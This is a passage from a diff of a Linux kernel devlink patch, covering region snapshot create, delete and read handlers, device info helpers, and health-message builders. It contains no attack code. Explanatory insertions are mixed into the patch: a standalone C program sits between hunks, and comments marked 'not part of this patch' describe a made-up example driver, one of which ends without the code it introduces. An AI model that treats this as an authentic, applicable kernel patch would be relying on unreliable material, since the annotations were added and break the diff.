++		if (err)
++			goto out;
++		(*idx)++;
++	}
++
++	list_for_each_entry(port, &devlink->port_list, list) {
++		err = devlink_nl_cmd_region_get_port_dumpit(msg, cb, port, idx,
++							    start);
++		if (err)
++			goto out;
++	}
++
++out:
++	devl_unlock(devlink);
++	return err;
++}
++
++static int devlink_nl_cmd_region_get_dumpit(struct sk_buff *msg,
++					    struct netlink_callback *cb)
++{
++	struct devlink *devlink;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err = 0;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		err = devlink_nl_cmd_region_get_devlink_dumpit(msg, cb, devlink,
++							       &idx, start);
++		devlink_put(devlink);
++		if (err)
++			goto out;
++	}
++out:
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int devlink_nl_cmd_region_del(struct sk_buff *skb,
++				     struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_snapshot *snapshot;
++	struct devlink_port *port = NULL;
++	struct devlink_region *region;
++	const char *region_name;
++	unsigned int index;
++	u32 snapshot_id;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_REGION_NAME) ||
++	    GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_REGION_SNAPSHOT_ID))
++		return -EINVAL;
++
++	region_name = nla_data(info->attrs[DEVLINK_ATTR_REGION_NAME]);
++	snapshot_id = nla_get_u32(info->attrs[DEVLINK_ATTR_REGION_SNAPSHOT_ID]);
++
++	if (info->attrs[DEVLINK_ATTR_PORT_INDEX]) {
++		index = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
++
++		port = devlink_port_get_by_index(devlink, index);
++		if (!port)
++			return -ENODEV;
++	}
++
++	if (port)
++		region = devlink_port_region_get_by_name(port, region_name);
++	else
++		region = devlink_region_get_by_name(devlink, region_name);
++
++	if (!region)
++		return -EINVAL;
++
++	mutex_lock(&region->snapshot_lock);
++	snapshot = devlink_region_snapshot_get_by_id(region, snapshot_id);
++	if (!snapshot) {
++		mutex_unlock(&region->snapshot_lock);
++		return -EINVAL;
++	}
++
++	devlink_region_snapshot_del(region, snapshot);
++	mutex_unlock(&region->snapshot_lock);
++	return 0;
++}
++
++static int
++devlink_nl_cmd_region_new(struct sk_buff *skb, struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_snapshot *snapshot;
++	struct devlink_port *port = NULL;
++	struct nlattr *snapshot_id_attr;
++	struct devlink_region *region;
++	const char *region_name;
++	unsigned int index;
++	u32 snapshot_id;
++	u8 *data;
++	int err;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_REGION_NAME)) {
++		NL_SET_ERR_MSG_MOD(info->extack, "No region name provided");
++		return -EINVAL;
++	}
++
++	region_name = nla_data(info->attrs[DEVLINK_ATTR_REGION_NAME]);
++
++	if (info->attrs[DEVLINK_ATTR_PORT_INDEX]) {
++		index = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
++
++		port = devlink_port_get_by_index(devlink, index);
++		if (!port)
++			return -ENODEV;
++	}
++
++	if (port)
++		region = devlink_port_region_get_by_name(port, region_name);
++	else
++		region = devlink_region_get_by_name(devlink, region_name);
++
++	if (!region) {
++		NL_SET_ERR_MSG_MOD(info->extack, "The requested region does not exist");
++		return -EINVAL;
++	}
++
++	if (!region->ops->snapshot) {
++		NL_SET_ERR_MSG_MOD(info->extack, "The requested region does not support taking an immediate snapshot");
++		return -EOPNOTSUPP;
++	}
++
++	mutex_lock(&region->snapshot_lock);
++
++	if (region->cur_snapshots == region->max_snapshots) {
++		NL_SET_ERR_MSG_MOD(info->extack, "The region has reached the maximum number of stored snapshots");
++		err = -ENOSPC;
++		goto unlock;
++	}
++
++	snapshot_id_attr = info->attrs[DEVLINK_ATTR_REGION_SNAPSHOT_ID];
++	if (snapshot_id_attr) {
++		snapshot_id = nla_get_u32(snapshot_id_attr);
++
++		if (devlink_region_snapshot_get_by_id(region, snapshot_id)) {
++			NL_SET_ERR_MSG_MOD(info->extack, "The requested snapshot id is already in use");
++			err = -EEXIST;
++			goto unlock;
++		}
++
++		err = __devlink_snapshot_id_insert(devlink, snapshot_id);
++		if (err)
++			goto unlock;
++	} else {
++		err = __devlink_region_snapshot_id_get(devlink, &snapshot_id);
++		if (err) {
++			NL_SET_ERR_MSG_MOD(info->extack, "Failed to allocate a new snapshot id");
++			goto unlock;
++		}
++	}
++
++	if (port)
++		err = region->port_ops->snapshot(port, region->port_ops,
++						 info->extack, &data);
++	else
++		err = region->ops->snapshot(devlink, region->ops,
++					    info->extack, &data);
++	if (err)
++		goto err_snapshot_capture;
++
++	err = __devlink_region_snapshot_create(region, data, snapshot_id);
++	if (err)
++		goto err_snapshot_create;
++
++	if (!snapshot_id_attr) {
++		struct sk_buff *msg;
++
++		snapshot = devlink_region_snapshot_get_by_id(region,
++							     snapshot_id);
++		if (WARN_ON(!snapshot)) {
++			err = -EINVAL;
++			goto unlock;
++		}
++
++		msg = devlink_nl_region_notify_build(region, snapshot,
++						     DEVLINK_CMD_REGION_NEW,
++						     info->snd_portid,
++						     info->snd_seq);
++		err = PTR_ERR_OR_ZERO(msg);
++		if (err)
++			goto err_notify;
++
++		err = genlmsg_reply(msg, info);
++		if (err)
++			goto err_notify;
++	}
++
++	mutex_unlock(&region->snapshot_lock);
++	return 0;
++
++err_snapshot_create:
++	region->ops->destructor(data);
++err_snapshot_capture:
++	__devlink_snapshot_id_decrement(devlink, snapshot_id);
++	mutex_unlock(&region->snapshot_lock);
++	return err;
++
++err_notify:
++	devlink_region_snapshot_del(region, snapshot);
++unlock:
++	mutex_unlock(&region->snapshot_lock);
++	return err;
++}
++
++static int devlink_nl_cmd_region_read_chunk_fill(struct sk_buff *msg,
++						 struct devlink *devlink,
++						 u8 *chunk, u32 chunk_size,
++						 u64 addr)
++{
++	struct nlattr *chunk_attr;
++	int err;
++
++	chunk_attr = nla_nest_start_noflag(msg, DEVLINK_ATTR_REGION_CHUNK);
++	if (!chunk_attr)
++		return -EINVAL;
++
++	err = nla_put(msg, DEVLINK_ATTR_REGION_CHUNK_DATA, chunk_size, chunk);
++	if (err)
++		goto nla_put_failure;
++
++	err = nla_put_u64_64bit(msg, DEVLINK_ATTR_REGION_CHUNK_ADDR, addr,
++				DEVLINK_ATTR_PAD);
++	if (err)
++		goto nla_put_failure;
++
++	nla_nest_end(msg, chunk_attr);
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(msg, chunk_attr);
++	return err;
++}
++
++#define DEVLINK_REGION_READ_CHUNK_SIZE 256
++
++static int devlink_nl_region_read_snapshot_fill(struct sk_buff *skb,
++						struct devlink *devlink,
++						struct devlink_region *region,
++						struct nlattr **attrs,
++						u64 start_offset,
++						u64 end_offset,
++						u64 *new_offset)
++{
++	struct devlink_snapshot *snapshot;
++	u64 curr_offset = start_offset;
++	u32 snapshot_id;
++	int err = 0;
++
++	*new_offset = start_offset;
++
++	snapshot_id = nla_get_u32(attrs[DEVLINK_ATTR_REGION_SNAPSHOT_ID]);
++	snapshot = devlink_region_snapshot_get_by_id(region, snapshot_id);
++	if (!snapshot)
++		return -EINVAL;
++
++	while (curr_offset < end_offset) {
++		u32 data_size;
++		u8 *data;
++
++		if (end_offset - curr_offset < DEVLINK_REGION_READ_CHUNK_SIZE)
++			data_size = end_offset - curr_offset;
++		else
++			data_size = DEVLINK_REGION_READ_CHUNK_SIZE;
++
++		data = &snapshot->data[curr_offset];
++		err = devlink_nl_cmd_region_read_chunk_fill(skb, devlink,
++							    data, data_size,
++							    curr_offset);
++		if (err)
++			break;
++
++		curr_offset += data_size;
++	}
++	*new_offset = curr_offset;
++
++	return err;
++}
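
A standalone sketch of the chunking arithmetic above: walk the
requested [start, end) window in DEVLINK_REGION_READ_CHUNK_SIZE steps,
with a short final chunk when the window is not a multiple of 256:

#include <stdio.h>

#define CHUNK_SIZE 256	/* DEVLINK_REGION_READ_CHUNK_SIZE */

int main(void)
{
	unsigned long long curr = 0, end = 600;

	while (curr < end) {
		unsigned int size = CHUNK_SIZE;

		if (end - curr < CHUNK_SIZE)
			size = (unsigned int)(end - curr);
		printf("chunk at offset %llu, %u bytes\n", curr, size);
		curr += size;
	}
	return 0;	/* prints chunks of 256, 256 and 88 bytes */
}
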
++
++static int devlink_nl_cmd_region_read_dumpit(struct sk_buff *skb,
++					     struct netlink_callback *cb)
++{
++	const struct genl_dumpit_info *info = genl_dumpit_info(cb);
++	u64 ret_offset, start_offset, end_offset = U64_MAX;
++	struct nlattr **attrs = info->attrs;
++	struct devlink_port *port = NULL;
++	struct devlink_region *region;
++	struct nlattr *chunks_attr;
++	const char *region_name;
++	struct devlink *devlink;
++	unsigned int index;
++	void *hdr;
++	int err;
++
++	start_offset = *((u64 *)&cb->args[0]);
++
++	devlink = devlink_get_from_attrs(sock_net(cb->skb->sk), attrs);
++	if (IS_ERR(devlink))
++		return PTR_ERR(devlink);
++
++	devl_lock(devlink);
++
++	if (!attrs[DEVLINK_ATTR_REGION_NAME] ||
++	    !attrs[DEVLINK_ATTR_REGION_SNAPSHOT_ID]) {
++		err = -EINVAL;
++		goto out_unlock;
++	}
++
++	if (info->attrs[DEVLINK_ATTR_PORT_INDEX]) {
++		index = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
++
++		port = devlink_port_get_by_index(devlink, index);
++		if (!port) {
++			err = -ENODEV;
++			goto out_unlock;
++		}
++	}
++
++	region_name = nla_data(attrs[DEVLINK_ATTR_REGION_NAME]);
++
++	if (port)
++		region = devlink_port_region_get_by_name(port, region_name);
++	else
++		region = devlink_region_get_by_name(devlink, region_name);
++
++	if (!region) {
++		err = -EINVAL;
++		goto out_unlock;
++	}
++
++	if (attrs[DEVLINK_ATTR_REGION_CHUNK_ADDR] &&
++	    attrs[DEVLINK_ATTR_REGION_CHUNK_LEN]) {
++		if (!start_offset)
++			start_offset =
++				nla_get_u64(attrs[DEVLINK_ATTR_REGION_CHUNK_ADDR]);
++
++		end_offset = nla_get_u64(attrs[DEVLINK_ATTR_REGION_CHUNK_ADDR]);
++		end_offset += nla_get_u64(attrs[DEVLINK_ATTR_REGION_CHUNK_LEN]);
++	}
++
++	if (end_offset > region->size)
++		end_offset = region->size;
++
++	/* return 0 if there is no further data to read */
++	if (start_offset == end_offset) {
++		err = 0;
++		goto out_unlock;
++	}
++
++	hdr = genlmsg_put(skb, NETLINK_CB(cb->skb).portid, cb->nlh->nlmsg_seq,
++			  &devlink_nl_family, NLM_F_ACK | NLM_F_MULTI,
++			  DEVLINK_CMD_REGION_READ);
++	if (!hdr) {
++		err = -EMSGSIZE;
++		goto out_unlock;
++	}
++
++	err = devlink_nl_put_handle(skb, devlink);
++	if (err)
++		goto nla_put_failure;
++
++	if (region->port) {
++		err = nla_put_u32(skb, DEVLINK_ATTR_PORT_INDEX,
++				  region->port->index);
++		if (err)
++			goto nla_put_failure;
++	}
++
++	err = nla_put_string(skb, DEVLINK_ATTR_REGION_NAME, region_name);
++	if (err)
++		goto nla_put_failure;
++
++	chunks_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_REGION_CHUNKS);
++	if (!chunks_attr) {
++		err = -EMSGSIZE;
++		goto nla_put_failure;
++	}
++
++	err = devlink_nl_region_read_snapshot_fill(skb, devlink,
++						   region, attrs,
++						   start_offset,
++						   end_offset, &ret_offset);
++
++	if (err && err != -EMSGSIZE)
++		goto nla_put_failure;
++
++	/* Check that some progress was made, to prevent an infinite loop */
++	if (ret_offset == start_offset) {
++		err = -EINVAL;
++		goto nla_put_failure;
++	}
++
++	*((u64 *)&cb->args[0]) = ret_offset;
++
++	nla_nest_end(skb, chunks_attr);
++	genlmsg_end(skb, hdr);
++	devl_unlock(devlink);
++	devlink_put(devlink);
++	return skb->len;
++
++nla_put_failure:
++	genlmsg_cancel(skb, hdr);
++out_unlock:
++	devl_unlock(devlink);
++	devlink_put(devlink);
++	return err;
++}
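++
++/* [Illustrative sketch, not part of this patch.] The dumpit above backs the
++ * "devlink region read" command; a typical invocation (device and region
++ * names here are assumptions) looks like:
++ *
++ *   devlink region read pci/0000:00:05.0/fw-health snapshot 1 \
++ *           address 0 length 16
++ *
++ * Reads are served in DEVLINK_REGION_READ_CHUNK_SIZE (256 byte) chunks and
++ * resume from cb->args[0] across netlink dump iterations.
++ */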
++
++int devlink_info_driver_name_put(struct devlink_info_req *req, const char *name)
++{
++	if (!req->msg)
++		return 0;
++	return nla_put_string(req->msg, DEVLINK_ATTR_INFO_DRIVER_NAME, name);
++}
++EXPORT_SYMBOL_GPL(devlink_info_driver_name_put);
++
++int devlink_info_serial_number_put(struct devlink_info_req *req, const char *sn)
++{
++	if (!req->msg)
++		return 0;
++	return nla_put_string(req->msg, DEVLINK_ATTR_INFO_SERIAL_NUMBER, sn);
++}
++EXPORT_SYMBOL_GPL(devlink_info_serial_number_put);
++
++int devlink_info_board_serial_number_put(struct devlink_info_req *req,
++					 const char *bsn)
++{
++	if (!req->msg)
++		return 0;
++	return nla_put_string(req->msg, DEVLINK_ATTR_INFO_BOARD_SERIAL_NUMBER,
++			      bsn);
++}
++EXPORT_SYMBOL_GPL(devlink_info_board_serial_number_put);
++
++static int devlink_info_version_put(struct devlink_info_req *req, int attr,
++				    const char *version_name,
++				    const char *version_value,
++				    enum devlink_info_version_type version_type)
++{
++	struct nlattr *nest;
++	int err;
++
++	if (req->version_cb)
++		req->version_cb(version_name, version_type,
++				req->version_cb_priv);
++
++	if (!req->msg)
++		return 0;
++
++	nest = nla_nest_start_noflag(req->msg, attr);
++	if (!nest)
++		return -EMSGSIZE;
++
++	err = nla_put_string(req->msg, DEVLINK_ATTR_INFO_VERSION_NAME,
++			     version_name);
++	if (err)
++		goto nla_put_failure;
++
++	err = nla_put_string(req->msg, DEVLINK_ATTR_INFO_VERSION_VALUE,
++			     version_value);
++	if (err)
++		goto nla_put_failure;
++
++	nla_nest_end(req->msg, nest);
++
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(req->msg, nest);
++	return err;
++}
++
++int devlink_info_version_fixed_put(struct devlink_info_req *req,
++				   const char *version_name,
++				   const char *version_value)
++{
++	return devlink_info_version_put(req, DEVLINK_ATTR_INFO_VERSION_FIXED,
++					version_name, version_value,
++					DEVLINK_INFO_VERSION_TYPE_NONE);
++}
++EXPORT_SYMBOL_GPL(devlink_info_version_fixed_put);
++
++int devlink_info_version_stored_put(struct devlink_info_req *req,
++				    const char *version_name,
++				    const char *version_value)
++{
++	return devlink_info_version_put(req, DEVLINK_ATTR_INFO_VERSION_STORED,
++					version_name, version_value,
++					DEVLINK_INFO_VERSION_TYPE_NONE);
++}
++EXPORT_SYMBOL_GPL(devlink_info_version_stored_put);
++
++int devlink_info_version_stored_put_ext(struct devlink_info_req *req,
++					const char *version_name,
++					const char *version_value,
++					enum devlink_info_version_type version_type)
++{
++	return devlink_info_version_put(req, DEVLINK_ATTR_INFO_VERSION_STORED,
++					version_name, version_value,
++					version_type);
++}
++EXPORT_SYMBOL_GPL(devlink_info_version_stored_put_ext);
++
++int devlink_info_version_running_put(struct devlink_info_req *req,
++				     const char *version_name,
++				     const char *version_value)
++{
++	return devlink_info_version_put(req, DEVLINK_ATTR_INFO_VERSION_RUNNING,
++					version_name, version_value,
++					DEVLINK_INFO_VERSION_TYPE_NONE);
++}
++EXPORT_SYMBOL_GPL(devlink_info_version_running_put);
++
++int devlink_info_version_running_put_ext(struct devlink_info_req *req,
++					 const char *version_name,
++					 const char *version_value,
++					 enum devlink_info_version_type version_type)
++{
++	return devlink_info_version_put(req, DEVLINK_ATTR_INFO_VERSION_RUNNING,
++					version_name, version_value,
++					version_type);
++}
++EXPORT_SYMBOL_GPL(devlink_info_version_running_put_ext);
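++
++/* [Illustrative sketch, not part of this patch.] A minimal example of how a
++ * driver's ->info_get() callback might use the helpers above; foo_info_get()
++ * and the name/version strings are assumptions for illustration only.
++ */
++static int foo_info_get(struct devlink *devlink, struct devlink_info_req *req,
++			struct netlink_ext_ack *extack)
++{
++	int err;
++
++	err = devlink_info_driver_name_put(req, "foo");
++	if (err)
++		return err;
++
++	err = devlink_info_serial_number_put(req, "ABC123");
++	if (err)
++		return err;
++
++	/* fixed = tied to the board, running = currently active */
++	err = devlink_info_version_fixed_put(req, "board.rev", "A1");
++	if (err)
++		return err;
++
++	return devlink_info_version_running_put(req, "fw", "1.2.3");
++}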
++
++static int
++devlink_nl_info_fill(struct sk_buff *msg, struct devlink *devlink,
++		     enum devlink_command cmd, u32 portid,
++		     u32 seq, int flags, struct netlink_ext_ack *extack)
++{
++	struct devlink_info_req req = {};
++	void *hdr;
++	int err;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	err = -EMSGSIZE;
++	if (devlink_nl_put_handle(msg, devlink))
++		goto err_cancel_msg;
++
++	req.msg = msg;
++	err = devlink->ops->info_get(devlink, &req, extack);
++	if (err)
++		goto err_cancel_msg;
++
++	genlmsg_end(msg, hdr);
++	return 0;
++
++err_cancel_msg:
++	genlmsg_cancel(msg, hdr);
++	return err;
++}
++
++static int devlink_nl_cmd_info_get_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct sk_buff *msg;
++	int err;
++
++	if (!devlink->ops->info_get)
++		return -EOPNOTSUPP;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_info_fill(msg, devlink, DEVLINK_CMD_INFO_GET,
++				   info->snd_portid, info->snd_seq, 0,
++				   info->extack);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int devlink_nl_cmd_info_get_dumpit(struct sk_buff *msg,
++					  struct netlink_callback *cb)
++{
++	struct devlink *devlink;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err = 0;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		if (idx < start || !devlink->ops->info_get)
++			goto inc;
++
++		devl_lock(devlink);
++		err = devlink_nl_info_fill(msg, devlink, DEVLINK_CMD_INFO_GET,
++					   NETLINK_CB(cb->skb).portid,
++					   cb->nlh->nlmsg_seq, NLM_F_MULTI,
++					   cb->extack);
++		devl_unlock(devlink);
++		if (err == -EOPNOTSUPP)
++			err = 0;
++		else if (err) {
++			devlink_put(devlink);
++			break;
++		}
++inc:
++		idx++;
++		devlink_put(devlink);
++	}
++
++	if (err != -EMSGSIZE)
++		return err;
++
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++struct devlink_fmsg_item {
++	struct list_head list;
++	int attrtype;
++	u8 nla_type;
++	u16 len;
++	int value[];
++};
++
++struct devlink_fmsg {
++	struct list_head item_list;
++	bool putting_binary; /* This flag forces binary data to be enclosed
++			      * in array brackets and requires use of the
++			      * dedicated API:
++			      * devlink_fmsg_binary_pair_nest_start()
++			      * devlink_fmsg_binary_pair_nest_end()
++			      */
++};
++
++static struct devlink_fmsg *devlink_fmsg_alloc(void)
++{
++	struct devlink_fmsg *fmsg;
++
++	fmsg = kzalloc(sizeof(*fmsg), GFP_KERNEL);
++	if (!fmsg)
++		return NULL;
++
++	INIT_LIST_HEAD(&fmsg->item_list);
++
++	return fmsg;
++}
++
++static void devlink_fmsg_free(struct devlink_fmsg *fmsg)
++{
++	struct devlink_fmsg_item *item, *tmp;
++
++	list_for_each_entry_safe(item, tmp, &fmsg->item_list, list) {
++		list_del(&item->list);
++		kfree(item);
++	}
++	kfree(fmsg);
++}
++
++static int devlink_fmsg_nest_common(struct devlink_fmsg *fmsg,
++				    int attrtype)
++{
++	struct devlink_fmsg_item *item;
++
++	item = kzalloc(sizeof(*item), GFP_KERNEL);
++	if (!item)
++		return -ENOMEM;
++
++	item->attrtype = attrtype;
++	list_add_tail(&item->list, &fmsg->item_list);
++
++	return 0;
++}
++
++int devlink_fmsg_obj_nest_start(struct devlink_fmsg *fmsg)
++{
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	return devlink_fmsg_nest_common(fmsg, DEVLINK_ATTR_FMSG_OBJ_NEST_START);
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_obj_nest_start);
++
++static int devlink_fmsg_nest_end(struct devlink_fmsg *fmsg)
++{
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	return devlink_fmsg_nest_common(fmsg, DEVLINK_ATTR_FMSG_NEST_END);
++}
++
++int devlink_fmsg_obj_nest_end(struct devlink_fmsg *fmsg)
++{
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	return devlink_fmsg_nest_end(fmsg);
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_obj_nest_end);
++
++#define DEVLINK_FMSG_MAX_SIZE (GENLMSG_DEFAULT_SIZE - GENL_HDRLEN - NLA_HDRLEN)
++
++static int devlink_fmsg_put_name(struct devlink_fmsg *fmsg, const char *name)
++{
++	struct devlink_fmsg_item *item;
++
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	if (strlen(name) + 1 > DEVLINK_FMSG_MAX_SIZE)
++		return -EMSGSIZE;
++
++	item = kzalloc(sizeof(*item) + strlen(name) + 1, GFP_KERNEL);
++	if (!item)
++		return -ENOMEM;
++
++	item->nla_type = NLA_NUL_STRING;
++	item->len = strlen(name) + 1;
++	item->attrtype = DEVLINK_ATTR_FMSG_OBJ_NAME;
++	memcpy(&item->value, name, item->len);
++	list_add_tail(&item->list, &fmsg->item_list);
++
++	return 0;
++}
++
++int devlink_fmsg_pair_nest_start(struct devlink_fmsg *fmsg, const char *name)
++{
++	int err;
++
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	err = devlink_fmsg_nest_common(fmsg, DEVLINK_ATTR_FMSG_PAIR_NEST_START);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_put_name(fmsg, name);
++	if (err)
++		return err;
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_pair_nest_start);
++
++int devlink_fmsg_pair_nest_end(struct devlink_fmsg *fmsg)
++{
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	return devlink_fmsg_nest_end(fmsg);
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_pair_nest_end);
++
++int devlink_fmsg_arr_pair_nest_start(struct devlink_fmsg *fmsg,
++				     const char *name)
++{
++	int err;
++
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	err = devlink_fmsg_pair_nest_start(fmsg, name);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_nest_common(fmsg, DEVLINK_ATTR_FMSG_ARR_NEST_START);
++	if (err)
++		return err;
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_arr_pair_nest_start);
++
++int devlink_fmsg_arr_pair_nest_end(struct devlink_fmsg *fmsg)
++{
++	int err;
++
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	err = devlink_fmsg_nest_end(fmsg);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_nest_end(fmsg);
++	if (err)
++		return err;
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_arr_pair_nest_end);
++
++int devlink_fmsg_binary_pair_nest_start(struct devlink_fmsg *fmsg,
++					const char *name)
++{
++	int err;
++
++	err = devlink_fmsg_arr_pair_nest_start(fmsg, name);
++	if (err)
++		return err;
++
++	fmsg->putting_binary = true;
++	return err;
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_binary_pair_nest_start);
++
++int devlink_fmsg_binary_pair_nest_end(struct devlink_fmsg *fmsg)
++{
++	if (!fmsg->putting_binary)
++		return -EINVAL;
++
++	fmsg->putting_binary = false;
++	return devlink_fmsg_arr_pair_nest_end(fmsg);
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_binary_pair_nest_end);
++
++static int devlink_fmsg_put_value(struct devlink_fmsg *fmsg,
++				  const void *value, u16 value_len,
++				  u8 value_nla_type)
++{
++	struct devlink_fmsg_item *item;
++
++	if (value_len > DEVLINK_FMSG_MAX_SIZE)
++		return -EMSGSIZE;
++
++	item = kzalloc(sizeof(*item) + value_len, GFP_KERNEL);
++	if (!item)
++		return -ENOMEM;
++
++	item->nla_type = value_nla_type;
++	item->len = value_len;
++	item->attrtype = DEVLINK_ATTR_FMSG_OBJ_VALUE_DATA;
++	memcpy(&item->value, value, item->len);
++	list_add_tail(&item->list, &fmsg->item_list);
++
++	return 0;
++}
++
++static int devlink_fmsg_bool_put(struct devlink_fmsg *fmsg, bool value)
++{
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	return devlink_fmsg_put_value(fmsg, &value, sizeof(value), NLA_FLAG);
++}
++
++static int devlink_fmsg_u8_put(struct devlink_fmsg *fmsg, u8 value)
++{
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	return devlink_fmsg_put_value(fmsg, &value, sizeof(value), NLA_U8);
++}
++
++int devlink_fmsg_u32_put(struct devlink_fmsg *fmsg, u32 value)
++{
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	return devlink_fmsg_put_value(fmsg, &value, sizeof(value), NLA_U32);
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_u32_put);
++
++static int devlink_fmsg_u64_put(struct devlink_fmsg *fmsg, u64 value)
++{
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	return devlink_fmsg_put_value(fmsg, &value, sizeof(value), NLA_U64);
++}
++
++int devlink_fmsg_string_put(struct devlink_fmsg *fmsg, const char *value)
++{
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	return devlink_fmsg_put_value(fmsg, value, strlen(value) + 1,
++				      NLA_NUL_STRING);
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_string_put);
++
++int devlink_fmsg_binary_put(struct devlink_fmsg *fmsg, const void *value,
++			    u16 value_len)
++{
++	if (!fmsg->putting_binary)
++		return -EINVAL;
++
++	return devlink_fmsg_put_value(fmsg, value, value_len, NLA_BINARY);
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_binary_put);
++
++int devlink_fmsg_bool_pair_put(struct devlink_fmsg *fmsg, const char *name,
++			       bool value)
++{
++	int err;
++
++	err = devlink_fmsg_pair_nest_start(fmsg, name);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_bool_put(fmsg, value);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_pair_nest_end(fmsg);
++	if (err)
++		return err;
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_bool_pair_put);
++
++int devlink_fmsg_u8_pair_put(struct devlink_fmsg *fmsg, const char *name,
++			     u8 value)
++{
++	int err;
++
++	err = devlink_fmsg_pair_nest_start(fmsg, name);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_u8_put(fmsg, value);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_pair_nest_end(fmsg);
++	if (err)
++		return err;
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_u8_pair_put);
++
++int devlink_fmsg_u32_pair_put(struct devlink_fmsg *fmsg, const char *name,
++			      u32 value)
++{
++	int err;
++
++	err = devlink_fmsg_pair_nest_start(fmsg, name);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_u32_put(fmsg, value);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_pair_nest_end(fmsg);
++	if (err)
++		return err;
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_u32_pair_put);
++
++int devlink_fmsg_u64_pair_put(struct devlink_fmsg *fmsg, const char *name,
++			      u64 value)
++{
++	int err;
++
++	err = devlink_fmsg_pair_nest_start(fmsg, name);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_u64_put(fmsg, value);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_pair_nest_end(fmsg);
++	if (err)
++		return err;
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_u64_pair_put);
++
++int devlink_fmsg_string_pair_put(struct devlink_fmsg *fmsg, const char *name,
++				 const char *value)
++{
++	int err;
++
++	err = devlink_fmsg_pair_nest_start(fmsg, name);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_string_put(fmsg, value);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_pair_nest_end(fmsg);
++	if (err)
++		return err;
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_string_pair_put);
++
++int devlink_fmsg_binary_pair_put(struct devlink_fmsg *fmsg, const char *name,
++				 const void *value, u32 value_len)
++{
++	u32 data_size;
++	int end_err;
++	u32 offset;
++	int err;
++
++	err = devlink_fmsg_binary_pair_nest_start(fmsg, name);
++	if (err)
++		return err;
++
++	for (offset = 0; offset < value_len; offset += data_size) {
++		data_size = value_len - offset;
++		if (data_size > DEVLINK_FMSG_MAX_SIZE)
++			data_size = DEVLINK_FMSG_MAX_SIZE;
++		err = devlink_fmsg_binary_put(fmsg, value + offset, data_size);
++		if (err)
++			break;
++		/* Exit from loop with a break (instead of
++		 * return) to make sure putting_binary is turned off in
++		 * devlink_fmsg_binary_pair_nest_end
++		 */
++	}
++
++	end_err = devlink_fmsg_binary_pair_nest_end(fmsg);
++	if (end_err)
++		err = end_err;
++
++	return err;
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_binary_pair_put);
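++
++/* [Illustrative sketch, not part of this patch.] A minimal reporter
++ * ->diagnose() callback built from the fmsg helpers above; foo_diagnose()
++ * and the key names are assumptions for illustration only. Note the outer
++ * object nest is opened/closed by the diagnose doit, so the callback only
++ * emits pairs.
++ */
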